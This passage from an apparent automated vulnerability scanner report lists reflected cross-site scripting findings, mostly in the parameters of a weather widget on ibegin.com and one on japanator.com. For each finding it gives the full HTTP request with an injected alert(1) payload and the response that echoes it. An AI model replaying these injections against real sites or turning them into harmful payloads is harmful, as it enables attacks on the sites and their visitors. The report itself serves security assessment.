Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff69b10;alert(1)//368093ffe90-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="backgrou
...[SNIP]...

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8f80%3balert(1)//21c5509fcb6 was submitted in the border_color parameter. This input was echoed as c8f80;alert(1)//21c5509fcb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000c8f80%3balert(1)//21c5509fcb6&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000c8f80;alert(1)//21c5509fcb6-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; colo
...[SNIP]...

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 285e6%3balert(1)//e4c184846bc was submitted in the border_width parameter. This input was echoed as 285e6;alert(1)//e4c184846bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1285e6%3balert(1)//e4c184846bc&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1285e6;alert(1)//e4c184846bc-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fffff
...[SNIP]...

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the city request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f10bd%3balert(1)//60cfe65333b was submitted in the city parameter. This input was echoed as f10bd;alert(1)//60cfe65333b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Restonf10bd%3balert(1)//60cfe65333b&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-restonf10bd;alert(1)//60cfe65333b-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div st
...[SNIP]...

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2dbae%3balert(1)//5b07d7be905 was submitted in the color parameter. This input was echoed as 2dbae;alert(1)//5b07d7be905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=0000002dbae%3balert(1)//5b07d7be905&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-0000002dbae;alert(1)//5b07d7be905-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-colo
...[SNIP]...

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the country request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31206%3balert(1)//199a4fe5d1a was submitted in the country parameter. This input was echoed as 31206;alert(1)//199a4fe5d1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us31206%3balert(1)//199a4fe5d1a&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us31206;alert(1)//199a4fe5d1a-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

documen
...[SNIP]...

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the current request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf0d4%3balert(1)//11ce2c9a945 was submitted in the current parameter. This input was echoed as bf0d4;alert(1)//11ce2c9a945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1bf0d4%3balert(1)//11ce2c9a945&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1bf0d4;alert(1)//11ce2c9a945-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style=
...[SNIP]...

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_family request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 33d1e%3balert(1)//6ffbaad9015 was submitted in the font_family parameter. This input was echoed as 33d1e;alert(1)//6ffbaad9015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana33d1e%3balert(1)//6ffbaad9015&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
tice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana33d1e;alert(1)//6ffbaad9015-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000;
...[SNIP]...

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_size request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5e6df%3balert(1)//029aa189bd3 was submitted in the font_size parameter. This input was echoed as 5e6df;alert(1)//029aa189bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=115e6df%3balert(1)//029aa189bd3&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-115e6df;alert(1)//029aa189bd3-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color:
...[SNIP]...

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the forecast request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fc4a7%3balert(1)//f9c3e7421 was submitted in the forecast parameter. This input was echoed as fc4a7;alert(1)//f9c3e7421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1fc4a7%3balert(1)//f9c3e7421&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1558


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1fc4a7;alert(1)//f9c3e7421-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="b
...[SNIP]...

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the padding request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3993a%3balert(1)//19a959291cc was submitted in the padding parameter. This input was echoed as 3993a;alert(1)//19a959291cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=103993a%3balert(1)//19a959291cc&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-103993a;alert(1)//19a959291cc-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fff
...[SNIP]...

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the showicons request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3eb8b%3balert(1)//795fc0174d6 was submitted in the showicons parameter. This input was echoed as 3eb8b;alert(1)//795fc0174d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=13eb8b%3balert(1)//795fc0174d6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
ce: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-13eb8b;alert(1)//795fc0174d6-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000; w
...[SNIP]...

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the smallicon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7f9f8%3balert(1)//d9661db8ae5 was submitted in the smallicon parameter. This input was echoed as 7f9f8;alert(1)//d9661db8ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=17f9f8%3balert(1)//d9661db8ae5&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-17f9f8;alert(1)//d9661db8ae5-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div styl
...[SNIP]...

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the state request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d844%3balert(1)//2cee12dca9c was submitted in the state parameter. This input was echoed as 6d844;alert(1)//2cee12dca9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia6d844%3balert(1)//2cee12dca9c&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia6d844;alert(1)//2cee12dca9c-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('
...[SNIP]...

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ac6d%3balert(1)//d4572dd3323 was submitted in the type parameter. This input was echoed as 1ac6d;alert(1)//d4572dd3323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js1ac6d%3balert(1)//d4572dd3323&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js1ac6d;alert(1)//d4572dd3323-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

docu
...[SNIP]...

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbbf2%3balert(1)//d1a0397db91 was submitted in the width parameter. This input was echoed as dbbf2;alert(1)//d1a0397db91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175dbbf2%3balert(1)//d1a0397db91&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175dbbf2;alert(1)//d1a0397db91-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #
...[SNIP]...

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e6c0"><script>alert(1)</script>555ac0fda78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

